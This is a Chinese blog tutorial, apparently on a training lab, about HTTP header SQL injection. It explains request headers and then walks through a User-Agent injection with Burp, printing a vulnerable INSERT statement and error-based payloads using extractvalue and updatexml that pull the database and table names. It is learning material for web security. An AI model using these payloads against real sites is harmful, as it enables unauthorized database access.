HTTP头部注入

已于 2022-02-19 10:15:11 修改
阅读量1.4k 收藏 7
点赞数
分类专栏: WEB安全 网络安全 渗透测试 文章标签: http 网络协议 网络
于 2022-02-18 21:08:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59872639/article/details/123008505
版权
网络安全 同时被 3 个专栏收录
51 篇文章 20 订阅
订阅专栏
渗透测试
40 篇文章 35 订阅
订阅专栏
WEB安全
32 篇文章 14 订阅
订阅专栏

HTTP Header概述

HTTP工作原理

HTTP报文类型

  • 请求报文(HTTP Request):由客户端发给服务器的消息,其组成包括请求行(Request-Line)、请求头域(Header-Field)和请求体(Entity-Body)
  • 响应报文(HTTP Response):由服务器回复给客户端的消息,其组成包括状态行(Status-Line)、响应头域(Header-Field)和响应体(Entity-Body)

HTTP请求报文组成

HTTP请求方法

 HTTP响应报文组成

 HTTP响应消息状态码

 HTTP Header内容

  • User-Agent:使服务器能够识别客户端使用的操作系统,浏览器版本等(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中)
  • Cookie: 网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)
  • Host:客户端指定自己想访问的Web服务器的域名/IP 地址和端口号。
  • X-Forwarded-For:简称XFF头,它代表客户端(即HTTP的请求端)真实的IP(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])
  • Client-IP:同上。
  • Referer:浏览器向Web服务器表明自己是从哪个页面链接过来的。

  HTTP Header注入

有时候,后台开发人员为了验证客户端HTTP Header(比如常用的Cookie验证等)或者通过HTTP Header头信息获取客户端的一些信息(比如User-Agent、Accept字段等)会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Header的注入漏洞。

 HTTP Header注入的前提条件

  • 能够对请求头消息进行修改
  • 修改的请求头信息能够带入数据库执行
  • 数据库没有对输入的请求头做过滤

常见的HTTP Header注入类型

  • Cookie注入
  • Referer注入
  • User-Agent注入
  • XFF注入 

 HTTP Header注入实例

判断注入类型

在尝试GET方法都失败后,我们判断其为POST方法

使用burp抓包

 页面输入正确的用户名密码后会回显用户代理User Agent头

 所以判断其为UA注入

在UA头后面添加' 出现报错信息,可以注入

 经过测试和查看源代码 有多种构造payload的方法

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
' and 1 and '
' or 1 or '
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0','','')#

 尝试使用order by 失败 所以使用报错函数注入

 获取网站库名

User-Agent: 'and extractvalue(1,concat('~',database())) ,'','')#
User-Agent:' and 1 and extractvalue(1,concat('~',database())) and '

获取表名

1' and updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1),'','')#
' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1),'','')#

 注意:这里并不是URL而是HTTP头,所以+并不会被转义为(空格),于是末尾的注释符号要变为#

1' and updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and '
' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and '

注意:因为这里or的语法,User-Agent应为空。而步骤1成功的原因不确定,教程中也为空但没有影响,猜测是数据库版本的问题。

.SYS.
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
http头部注入
我不是大牛
06-25 5729
http头部注入 我们首先可以在浏览器设置手动代理模式,然后通过burpsuite进行代理配置后进行抓包,如下是一个网站登录页面的http头部信息: POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/201...
Header注入
笔墨稠思
11-06 2001
靶场 当我们使用get/post注入,发现特殊的符号或单词被设置了检测,被办了,我们可以尝试检测是否存在Header注入 什么是Header注入? 我们网页,在向服务器发送请求时,会携带一些信息 如图所示,Request Headers 这部分都是请求头,这里面有一部分记录的是浏览器与服务器的链接状态,还有一些是记录我们的用户信息 例如:User-Agent 记录了我们当前操作系统,浏览器内核版本 Referer记录了我们的来源 当然,请求头中内容不仅仅是这些,还可能存在cookie http-X-Fo
网络安全——HTTP头部注入
weixin_54055099的博客
09-16 6984
SQL注入HTTP头部注入,两个例子:Use-Agent注入、XFF注入
5、HTTP header注入(详解)
最新发布
weixin_51520483的博客
05-18 1004
1、抓包要根据包信息和页面功能来判断内容是不是想要的,比如cookie内容2、payload选择要判断有一个已知内容为真,就可以用and或者or;判断不了就用or3、user-agent注入:因为它是作为一个整体字符串处理,你可以直接覆盖整个字段的值。4、cooke注入:因为它是解析为多个键值对,你需要确保你的 payload 完全覆盖特定键的值,或者设计你的 payload 使其在原有值基础上有效执行。
【web安全】——HTTP请求头注入
Demo不是emo的博客
01-10 4623
http请求头注入操作
HTTP注入
ssslq的博客
03-02 786
HTTP头部,User-Agent、XFF注入
14、注入篇-- Header注入
WX公众号-小白学安全
04-05 1008
文章目录原理利用防范靶场 原理 利用 防范 靶场
HTTP头部信息
Jinmy的博客
09-23 1120
HTTP头部信息 每个HTTP请求和响应都会带有相应的头部信息。 默认请问下,在发送xhr请求的同时, 还会发送下列头部信息: Accept:浏览器能够处理的内容类型 Accept-Charset:浏览器能够显示的字符集 Accept-Encoding:浏览器能够处理的压缩编码 Accept-Language:浏览器 与服务器之间连接的类型 Cookie:当前页面设置所在的域 Re...
SQL注入分类.ppt
10-27
GET 注入注入点位置在 GET 参数部分,POST 注入注入字段在 POST 数据中(表单提交、产品查询),Cookie 注入注入字段在 Cookie 数据中,搜索型注入注入处为搜索的地点(也属于 POST 注入),HTTP 头部注入的...
SQL注入分类.pptx
10-27
* HTTP 头部注入注入点在 HTTP 请求头部的某个字段中。 其他注入方法 除了以上分类外,还有其他几种 SQL 注入方法: * 伪静态注入 * base64 注入 * 二阶注入 * XML 实体注入 * phpcmsv9 authkey 注入 页面返回...
Cookie在线注入工具
12-13
4. **漏洞探测**:扫描目标网站寻找可能的注入点,如未过滤的HTTP头部或响应。 5. **结果分析**:记录并分析注入尝试的结果,帮助攻击者判断哪些注入策略最有效。 不过,值得注意的是,使用这类工具违反了网络安全...
啊D注入工具_v2.32_注入关键词.rar
08-11
5. **可定制化**:用户可以根据自己的需求调整扫描策略,比如设置线程数量、延迟时间、HTTP头部信息等,以适应不同的测试环境。 6. **安全性分析**:除了基本的注入检测,啊D注入工具还可能提供一些高级功能,如弱...
http服务代码
04-29
HTTP请求由请求行、请求头部和空行组成,例如"GET / HTTP/1.1"表示获取根目录下的资源。服务器解析这些信息,然后根据请求类型(如GET、POST等)进行相应的操作。如果请求的是静态文件,服务器直接读取文件内容并...
Header:请求头参数详解
panying1的博客
12-08 2603
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
渗透测试——HTTP头部注入
zjdda的博客
05-21 6693
1.head头部注入实战 对http://injectx1.lab.aqlab.cn:81/ 靶场的pass-08-10进行head头部注入,获得flag 环境:靶场 1.pass-08 1).开启代理模式,使用用户:admin;密码:123456进行登录,使用burp抓包 2).使用’or sleep(5),1)#判断注入点;响应时间为5秒,确认注入点。 3).使用报错注入爆数据库名:head_error 参考文章:https://blog.csdn.net/zjdda/article/detail
14、SQL注入——HTTP文件头注入
qq_55202378的博客
12-05 485
(1)请求报文由客户端发给服务器得消息,其组成包括请求行、请求头域和请求体。HTTP请求方法GET :请求指定得页面信息,并返回实体主体。HEAD:类似GET请求,只不过返回得响应中没有具体内容,用户获取报头。POST:向指定资源提交数据进行处理请求(例如提交表单或上传文件)。数据被包含在请求体中。POST请求可能会导致新的资源的建立或已有资源的修改。PUT:从客户端向服务器传送的数据取代指定的文档内容。DELETE:请求服务器删除指定的页面。
SQL注入HTTP头部注入
QYbkx974的博客
11-07 258
1.堆叠查询2.宽字节注入3.Cookie 注入4.base64 注入5.User-Agent 注入6.referer 注入
sql注入(5)http-header注入(附工具)
c10udz的博客
05-11 720
目录 一.http-header注入 1.原理 2.注入条件 二.User-Agent注入 1.准备 2.寻找注入点 3.信息和数据收集 三.Rerferer注入 四.XFF注入 五.工具 1.hackbar插件 2.burpsuite 3.FoxyProxy插件 一.http-header注入 1.原理 开发人员为了验证客户端头信息,或者获取客户端的一些信息,会对客户端的http-header信息进行获取并使用sql语句进行处理,头注入就是...
如何使用PDO参数化插入的方式防止HTTP头部注入攻击
06-03
使用PDO参数化插入的方式可以有效地防止HTTP头部注入攻击。具体步骤如下: 1. 在PDO预处理语句中,使用问号(?)或冒号(:参数名)等占位符来代替需要插入的变量。 2. 使用PDOStatement对象的bindParam()或bind...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值